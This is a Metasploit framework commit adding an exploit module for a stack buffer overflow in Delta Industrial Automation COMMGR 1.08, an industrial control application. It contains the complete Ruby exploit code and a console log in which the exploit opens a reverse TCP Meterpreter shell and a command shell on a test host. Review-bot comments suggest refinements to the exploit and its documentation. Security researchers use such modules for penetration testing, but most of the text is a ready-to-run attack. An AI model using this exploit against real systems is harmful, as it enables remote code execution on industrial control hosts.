Land #10672, Add COMMGR Buffer Overflow module

4.x
Shelby Pace 2018-10-08 10:04:52 -05:00 committed by Metasploit
parent 2c34813e6b
commit ec5530ece1
GPG Key ID: CDFB5FA52007B954
2 changed files with 142 additions and 0 deletions


@ -0,0 +1,67 @@
## Vulnerable Application
Delta Electronics Delta Industrial Automation COMMGR 1.08 is affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code. This module has been tested successfully on Windows XP SP3, Windows 7 SP1, and Windows 8.1. The vulnerable application is available for download at http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=7763&DocPath=1&hl=en-US.
## Verification Steps
1. Install Delta Industrial Automation COMMGR 1.08
2. Start ```msfconsole```
3. Do ```use exploit/windows/scada/delta_ia_commgr_bof```
4. Do ```set RHOST <target_ip>```
5. Do ```run```
6. You should get a shell. :)
## Scenarios
### Delta Industrial Automation COMMGR 1.08 on Windows 7 SP1
```
msf > use exploit/windows/scada/delta_ia_commgr_bof
msf exploit(windows/scada/delta_ia_commgr_bof) > show options
Module options (exploit/windows/scada/delta_ia_commgr_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 502 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 COMMGR 1.08 / Windows Universal
msf exploit(windows/scada/delta_ia_commgr_bof) > set RHOST 192.168.3.64
RHOST => 192.168.3.64
msf exploit(windows/scada/delta_ia_commgr_bof) > run
[*] Started reverse TCP handler on 192.168.3.150:4444
[*] 192.168.3.64:502 - Trying target COMMGR 1.08 / Windows Universal, sending 4601 bytes...
[*] Sending stage (179779 bytes) to 192.168.3.64
[*] Meterpreter session 1 opened (192.168.3.150:4444 -> 192.168.3.64:49170) at 2018-09-18 23:38:51 -0700
meterpreter > sysinfo
Computer : TEST01
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > shell
Process 932 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Delta Industrial Automation\COMMGR 1.08>exit
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.3.64 - Meterpreter session 1 closed. Reason: User exit
msf exploit(windows/scada/delta_ia_commgr_bof) >
```
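Review bot: the Verification Steps jump from `set RHOST <target_ip>` (step 4) straight to `run` (step 5), yet the scenario output shows a reverse TCP handler starting on 192.168.3.150:4444, so a reader following the steps literally will also need to set LHOST (and PAYLOAD, unless the default is intended); add a `set LHOST <attacker_ip>` step between steps 4 and 5 and name the payload the scenario used. Two rendering points in the same file: the `## Verification Steps` and `## Scenarios` headings and the opening code fence have no blank line before them, which some Markdown renderers need to start a new block, and the download URL in the first paragraph runs directly into the sentence's closing period, which renderers tend to fold into the link; put a space or angle brackets around the URL.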


@ -0,0 +1,75 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
crafted packets. This module has been tested successfully on Delta Electronics Delta
Industrial Automation COMMGR 1.08 over
Windows XP SP3,
Windows 7 SP1, and
Windows 8.1.
},
'Author' =>
[
't4rkd3vilz', # PoC
'hubertwslin' # Metasploit module
],
'References' =>
[
[ 'EDB', '44965'],
[ 'CVE', '2018-10594']
],
'Payload' =>
{
'Space' => 640,
'DisableNops' => true,
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Targets' =>
[
[ 'COMMGR 1.08 / Windows Universal',
{
'Ret' => 0x00401e14, # p/p/r COMMGR.exe
'Offset' => 4164
}
],
],
'DisclosureDate' => 'Jul 02 2018',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(502)
])
end
def exploit
data = rand_text_alpha(target['Offset'])
data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled
data << [target.ret].pack("V")
data << make_nops(40)
data << payload.encoded
print_status("Trying target #{target.name}, sending #{data.length} bytes...")
connect
sock.put(data)
disconnect
end
end
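Review bot: the module has no `check` method, and `exploit` connects and writes the overflow to whatever is listening on RPORT 502 (the Modbus/TCP port) without any fingerprinting, so there is nothing to confirm the target is actually COMMGR 1.08 before its stack is corrupted; consider adding a `check` that at least verifies the port opens and, if the service offers anything identifiable, inspects it, or state in the description that the module fires blind. Smaller points in the same hunk: the comment on `data << "\xeb\x27\x90\x90"` reads `jmp short $+27`, but `\xeb\x27` is a forward jump of 0x27 (39) bytes, which is exactly what carries execution over the two NOPs and the 4-byte `Ret` into the 40-byte `make_nops` sled, so write the displacement as `0x27` to avoid it being read as decimal; the single target is labelled "Windows Universal" but relies on `0x00401e14` in COMMGR.exe not being rebased, which is worth a comment next to `Ret`; and the trailing comma after `'EXITFUNC' => 'thread',` together with the double-quoted `pack("V")` (single quotes suffice) will be flagged by rubocop.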